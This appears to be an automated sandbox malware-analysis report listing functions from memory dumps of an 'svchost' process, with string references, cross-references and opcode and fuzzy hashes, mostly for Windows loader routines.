TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03BA1B39
minkernel\ntdll\ldrtls.c, xrefs: 03BA1B4A

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: 17137a644a5dfc892d8957eda0016c16a78e00b6613f1ddc80ea221468708d1b
Instruction ID: d90fc68869b92db5da2160de3fd093ad2d965d20e7ab00bea8891af02134ea25
Opcode Fuzzy Hash: 17137a644a5dfc892d8957eda0016c16a78e00b6613f1ddc80ea221468708d1b
Instruction Fuzzy Hash: 9E4170B9A00B04AFCB15DFACC841BAEFBF5FF49718F1481A9E416A7251D774A900CB90

Function 03BEC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 03BEC1F1
PreferredUILanguages, xrefs: 03BEC212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 03BEC1C5

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: fb80e09286bcaa5bad6bcc38fc062bc48a8aa63de587c3e140bcf2403063bbc7
Instruction ID: cf4dab442280d06b12c26242e33ae67e48d0e5af490a83b867ebcd3f68e79bd2
Opcode Fuzzy Hash: fb80e09286bcaa5bad6bcc38fc062bc48a8aa63de587c3e140bcf2403063bbc7
Instruction Fuzzy Hash: F8416175E00219EBDF11DFD8C845FEEBBB8EB04708F1441BAE515B7290D7749A448B54

Function 03BC4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 03BC4172
LdrpResValidateFilePath Enter, xrefs: 03BC4160
@, xrefs: 03BC4225

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 3ffa62f641a345d916126fb03ee1de9767e49f72552778be8f108790e3d472c2
Instruction ID: 235688c85f3b097e9b56bc0a246cbe83059be7448526b8b8217d6ec1c5236d8b
Opcode Fuzzy Hash: 3ffa62f641a345d916126fb03ee1de9767e49f72552778be8f108790e3d472c2
Instruction Fuzzy Hash: 8E41E475A203988BDB32DB96C851BADBBB8EF55348F1804FDD851EF781DA748A01CB11

Function 03BB4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 03BB488F
minkernel\ntdll\ldrredirect.c, xrefs: 03BB4899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03BB4888

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 51ba4268c3af9478f3866e67b5bee6f4fbb24fb8ff69fbb34c08f9a8bf1395c1
Instruction ID: a728a701124493b6a7d97604b8fec58a71092031962651f1f89a02547967b815
Opcode Fuzzy Hash: 51ba4268c3af9478f3866e67b5bee6f4fbb24fb8ff69fbb34c08f9a8bf1395c1
Instruction Fuzzy Hash: E541A4726047509FCB21CE5AD840AB6BBF4FB49A58F0905F9EC58DB252DBB0D800CB91

Function 03B633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context data, xrefs: 03BA29FE
Actx , xrefs: 03B633AC
RtlCreateActivationContext, xrefs: 03BA29F9

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: eaab879129e3d70680e27e35531affbc07e15cd117495b7528a4123f54347468
Instruction ID: e36e767d3f52ef3238c3dc8e69abf5d5935ccfb4853f948bcb97eb25a87c7d37
Opcode Fuzzy Hash: eaab879129e3d70680e27e35531affbc07e15cd117495b7528a4123f54347468
Instruction Fuzzy Hash: A83123366007059FDB26DE58D8D0BA6B7E4EB84718F0984B9E9099F2A6CB74D841CB90

Function 03B61607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

DLL "%wZ" has TLS information at %p, xrefs: 03BA1A40
minkernel\ntdll\ldrtls.c, xrefs: 03BA1A51
LdrpInitializeTls, xrefs: 03BA1A47

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 30922ffd0525cea95bb7e204c18a04a983f400ef9316db6194172e7c37afc125
Instruction ID: 5080b07e244e0fd158ec76b14303600c494b7adaabfcecfbefb0795c265c0308
Opcode Fuzzy Hash: 30922ffd0525cea95bb7e204c18a04a983f400ef9316db6194172e7c37afc125
Instruction Fuzzy Hash: 2C310476A10600ABDB20DB5CC945F7AB6ACEB5675CF0800F9E505EB191E774AD0487A0

Function 03B71270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

BuildLabEx, xrefs: 03B7130F
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 03B7127B
@, xrefs: 03B712A5

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: eb3e376d2c6eb8852b8cce7702a29e5a94f993ea2d18d6ae1c4790ed07303f7b
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: 7C31A47690061CBFDB11DF99CC44EAEBBBDEB44718F0044B5E924AB260D730DA059B60

Function 03BB20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 03BB20F3
minkernel\ntdll\ldrinit.c, xrefs: 03BB2104
LdrpInitializationFailure, xrefs: 03BB20FA

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 6f322993dd413d288fbefb9342958d3258a127443fb0be8962823bb9541faf81
Instruction ID: 163ecbe19c04de06dd81fdb19bafd7ae9c8d3909e153bb53049fe0dd12ba2c9e
Opcode Fuzzy Hash: 6f322993dd413d288fbefb9342958d3258a127443fb0be8962823bb9541faf81
Instruction Fuzzy Hash: 4FF0FF35750308ABDA20EA4CCC02FAA7768EB40A4CF5408F5F600AF685D6E0A9108A80

Function 03B403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 03B94D8A

Strings

#%u, xrefs: 03B94D82

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 08700ee4989b09f1b0a7d8b37d85f4fb9e96c7e3bdc1302ec989369ec898ce1a
Instruction ID: 943cb3373c5acd5ccf990d6b41878a5ba9d1f914f421e399e1fd20000af5c32a
Opcode Fuzzy Hash: 08700ee4989b09f1b0a7d8b37d85f4fb9e96c7e3bdc1302ec989369ec898ce1a
Instruction Fuzzy Hash: 23715B75A002099FDB01DFA9C990BAEB7F8EF48308F1840B5E905EB251EB34ED01CB65

Function 03BD705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 03BD70C8

Strings

kLsE, xrefs: 03BD70A4

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID: DebugPrintTimes
String ID: kLsE
API String ID: 3446177414-3058123920
Opcode ID: 85bfd7cffb77f9b8773a7e3775d73b4a8853f29dfca4916100b3e52d059ca003
Instruction ID: aa435c13544f4dd342aa90d1d29ef810a5866b6dcc22e0611e93b8e9a2634745
Opcode Fuzzy Hash: 85bfd7cffb77f9b8773a7e3775d73b4a8853f29dfca4916100b3e52d059ca003
Instruction Fuzzy Hash: E34144365213514BD331FF65E846BA97B94EB10B2CF1802B9ED60CE0C9DFB04895C7A0

Function 03B452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 03B455A3
@, xrefs: 03B45445

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 0c4c00afa68be1b0d9220678f85666b7ae91bc19dae6adc3534ae0a826fda1d9
Instruction ID: 1ea74bf3641a8d55ad07c6ca3e88bae3041bb1f2b8af0ccd56bc5e160587e936
Opcode Fuzzy Hash: 0c4c00afa68be1b0d9220678f85666b7ae91bc19dae6adc3534ae0a826fda1d9
Instruction Fuzzy Hash: 0B32A9745087118BDB34CF18C580B3AB7E5EF8A658F1849BFF8969B290E734D840EB56

Function 03BFA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 03BFA551
`, xrefs: 03BFA44B

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 3616ac15daf6d512e4e5520b008fbfca145e6cd6406f6140b161fa2eb5941ccb
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 4FC19C312043429FDB28CE28C841B6BFBE5EF84358F085ABDF6998A290D775D509CF51

Function 03B30CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON

Download Yara Rule

Strings

ResIdCount less than 2., xrefs: 03B8EEC9
Failed to retrieve service checksum., xrefs: 03B8EE56

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
API String ID: 0-863616075
Opcode ID: 4c717c9749a785da54edd19921656b58d31e05046a5459ed2361f8ad7a10232c
Instruction ID: 1355bc9086ab44b91084e27011754c63453f0d34cebf1f059477db7738737747
Opcode Fuzzy Hash: 4c717c9749a785da54edd19921656b58d31e05046a5459ed2361f8ad7a10232c
Instruction Fuzzy Hash: 68E1F4B19087849FE364DF15C440BABFBE4FF88319F408A6EE5998B240DB709909CF56

Function 00402500 Relevance: 2.7, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

gfff, xrefs: 004026C7
VUUU, xrefs: 004025F2

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: VUUU$gfff
API String ID: 0-2662692612
Opcode ID: fff46b259ea5f1012900593c73531a53cf5d1690b67631bc003473dc7a283120
Instruction ID: 05951123152ac819a2594d91c3b7c82ff70c3bda930c798850fb8a3d2faf6110
Opcode Fuzzy Hash: fff46b259ea5f1012900593c73531a53cf5d1690b67631bc003473dc7a283120
Instruction Fuzzy Hash: 9B51B471B001059BCF1CCE5CCEA466EB3A6EB94304B14857BE905DF3D1EAB5DD518788

Function 03BAE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 03BAE75A
UEFI, xrefs: 03BAE751

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 68a0bce456463ba2db6a5280144301578889608e5ad1df18f6421cccf288d90c
Instruction ID: 07567737c6c5fd72454cf39970078d5b25f6821cbff1bdb766a4bb9fdc643950
Opcode Fuzzy Hash: 68a0bce456463ba2db6a5280144301578889608e5ad1df18f6421cccf288d90c
Instruction Fuzzy Hash: 40612A72E04B189FDB24DFAC8980BADBBB9FB44708F5440B9E559EB291D731E940CB50

Function 03B4F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 03B4F7F6
$, xrefs: 03B4F860

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: $$$
API String ID: 0-233714265
Opcode ID: cfcf603bcb85503cae91aa92c671f9b2a00b6dc998bac5316ae8b64683623fad
Instruction ID: 96f2808286185dc0e591109a77210bbf6443484648611dcd58ac15583c5c7251
Opcode Fuzzy Hash: cfcf603bcb85503cae91aa92c671f9b2a00b6dc998bac5316ae8b64683623fad
Instruction Fuzzy Hash: 3561A775A0074ADFDB20EFA4C580BADB7B1FF48308F0840B9D515AF680DB74A945EB98

Function 03B3A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 03B3A309
RtlpResUltimateFallbackInfo Enter, xrefs: 03B3A2FB

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 3b126635d626224d26a92d8794dbbd3d443416db3ae10b3bd03eb966366be2f1
Instruction ID: ff99742d3ac86142afc262268e44da37a86b1e225982b754b357f928a4b7adce
Opcode Fuzzy Hash: 3b126635d626224d26a92d8794dbbd3d443416db3ae10b3bd03eb966366be2f1
Instruction Fuzzy Hash: 61419F35A04659EBDB11CF69C880B69B7F4EF46708F2844F6DC44DF291E675DA00CB51

Function 03B6329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

.Local\, xrefs: 03B632B5
@, xrefs: 03B6330D

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: a9a2816890ea4977d7cddee42d80b3df3bb8ba48fd2d387302e1e60f84213539
Instruction ID: 996527695c1ff0759bca7b177b8c68a1916087b9a8cfdee588d2258c51fcacca
Opcode Fuzzy Hash: a9a2816890ea4977d7cddee42d80b3df3bb8ba48fd2d387302e1e60f84213539
Instruction Fuzzy Hash: F93195795087049FC711DF28C980A5BBBE8FBC5658F4809BEF59987261DA34DE04CB92

Function 03B3C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 03B3C8C3, 03B3CA40

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: c96549afd1db69b6715b7e0ce0a2cd1e5810eab78db865eb5a7c984bb3599905
Instruction ID: 42e6ccab40a57697d3b9722dc66085b597700435a3d2120abb0c35031aa73cbb
Opcode Fuzzy Hash: c96549afd1db69b6715b7e0ce0a2cd1e5810eab78db865eb5a7c984bb3599905
Instruction Fuzzy Hash: 2D823C75E002289BDB24CFA9C880BEDFBB5FF4A718F1881B9D859AB254D7309D45CB50

Function 03B82F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON

Download Yara Rule

Strings

P`vRbv, xrefs: 03B8300D, 03B833E4, 03B8343B, 03B834FE, 03B8352E

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: P`vRbv
API String ID: 0-2392986850
Opcode ID: 298252000b05bf2aaeee3e5ba406877bda35cda8b6bd74c16a326149ec961091
Instruction ID: 51f16b1b2f46c516c87773c830fcf34ea3a59932e6a9248c8d672b7e9158da7d
Opcode Fuzzy Hash: 298252000b05bf2aaeee3e5ba406877bda35cda8b6bd74c16a326149ec961091
Instruction Fuzzy Hash: E542B27DD0425AAADF25FF68D4446BDBBF5EB04B18F1C80FAD449AB280D6748A81CB50

Function 03B37370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d99a42c6d433139e446857e9432f4bb485f7dfce12d2938599164cc4a4944f9
Instruction ID: f677a7bf378cf0b30f8b52fe7628fb97b1457e4ab9997fffea04efd1b3f427e9
Opcode Fuzzy Hash: 5d99a42c6d433139e446857e9432f4bb485f7dfce12d2938599164cc4a4944f9
Instruction Fuzzy Hash: 42A17FB5608342CFD724DF28C481A2ABBE5FF89308F1549BEE5859B350DB30E945CB92

Function 03B52E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON

Download Yara Rule

Strings

0, xrefs: 03B53240

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 4593bd85b03c3410bcddbcb94bbf03349bd59b596dd24b9baac6d99abe429533
Instruction ID: 04552f2be2627154490925ccf4fd96512044911b3e05e03cd0483635618f5b63
Opcode Fuzzy Hash: 4593bd85b03c3410bcddbcb94bbf03349bd59b596dd24b9baac6d99abe429533
Instruction Fuzzy Hash: 95F19C796087458FDB25CF24D480B6ABBE5EF88698F0948FDFC898B340DB34D9458B52

Function 0041707E Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 0041739F

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: e9cb8a51d573f028c6c9c4ea799356c0603fecfd9e0128913c352a69a837206b
Instruction ID: f4d07628135b91c999a078dd09bbd64770b26c8724e472dcd38b047b9fada27a
Opcode Fuzzy Hash: e9cb8a51d573f028c6c9c4ea799356c0603fecfd9e0128913c352a69a837206b
Instruction Fuzzy Hash: 45021CB6E006189FDB54CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80

Function 00417083 Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 0041739F

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: 93b48022dfc3ccae68d6fc8cb34d583479490f3ae1ae56717b7ef237593ee509
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: A8021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80

Function 03B32FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

PATH, xrefs: 03B330D6, 03B33124

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 6ea759190fc7d08b2fdc879005befdcf2878a0c11076114cf992924458e22f3b
Instruction ID: 2528c44260f8f9877cd71affb0f3d7242ed88d6465619835841adcfafc559053
Opcode Fuzzy Hash: 6ea759190fc7d08b2fdc879005befdcf2878a0c11076114cf992924458e22f3b
Instruction Fuzzy Hash: 31F1CF79E102289BCB25DF99D881ABEB7F1FF49308F4840B9E448EB250DB749D51CB61

Function 03B6F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a22258a4472a3ea841619a4cf003b0910599ff34335663d2f14ea62ba79551b6
Instruction ID: 1cc657d0eed6576eb4563f41afa170b0a110ad0656f6a0c525d5a8a7a2dedcb4
Opcode Fuzzy Hash: a22258a4472a3ea841619a4cf003b0910599ff34335663d2f14ea62ba79551b6
Instruction Fuzzy Hash: C0414AB9900288AFDB20DFA9D880AADFBF4FB48304F5441AED859E7216D7349900CB60

Function 03B30100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

, xrefs: 03B30255

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7192d521029daac14b2a17e710abb15f4246902d028048c84cf771c082d12e60
Instruction ID: 6a49edbe3a0b9795931416bd518559a153097ab6e6cd86fff47c0c3569e2f325
Opcode Fuzzy Hash: 7192d521029daac14b2a17e710abb15f4246902d028048c84cf771c082d12e60
Instruction Fuzzy Hash: C9A1DA35E083786ADF24FA298841BFEB7A99F4670CF0840F9ED876B281D674CA44C751

Function 004012A0 Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

sHM, xrefs: 00401490

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: sHM
API String ID: 0-1294282591
Opcode ID: c857cdd29d0c61f02d557526ede579f47c54e42a11841738ce03a2e76cac249c
Instruction ID: 9030708395b86e0e49cf11f7e2567085bfa5a3e9924fbf23ac23bab99bd6ed6d
Opcode Fuzzy Hash: c857cdd29d0c61f02d557526ede579f47c54e42a11841738ce03a2e76cac249c
Instruction Fuzzy Hash: E2817E71E1064A87CF08CFA9C8910EEF7B0EFA9300B14929AED057F355E7749A91CB95

Function 03B3973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

@, xrefs: 03B397F3

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction ID: 47091192812c630d5ed9d2317351299869035e13bcf7dd3b113820555dd7f8c9
Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction Fuzzy Hash: 07615E75D00229EBDF21DF99C840BAEFBB8FF85758F1445BAE821AB290D7749901CB50

Function 03BBF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 03BBF867

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction ID: b54c82c18204d8318ae81c0d6e8e5a44b01b8a0c9b843e6e7789992f3ee15d3f
Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction Fuzzy Hash: 87517772604705AFD721DE54CC40FBAB7F8FB84758F0809B9B9949B290DBB0E914CB96

Function 03B4E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 03B4E6A4

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: b8a018243720a24d5f6b1f390064bd694dc4c2389e75349817e66d005ed42ee2
Instruction ID: 98528b3108daaeeb035203780e1b25476bb6e281ce958895940c5bb7d6043466
Opcode Fuzzy Hash: b8a018243720a24d5f6b1f390064bd694dc4c2389e75349817e66d005ed42ee2
Instruction Fuzzy Hash: D0417E76508311ABD720DA648980B6BB7E8FF8871CF0409BAF584EB180EA74D904D79A

Function 03BEB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 03BEB28F

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: c2c9035fad7ccf6199d41379dace59b2057d3565583dcd80d9c413df0cfc884d
Instruction ID: 4f1e37353cd7258121da84bcaeb6b701ca11aed9e8ceebddbe90d69f9373d09b
Opcode Fuzzy Hash: c2c9035fad7ccf6199d41379dace59b2057d3565583dcd80d9c413df0cfc884d
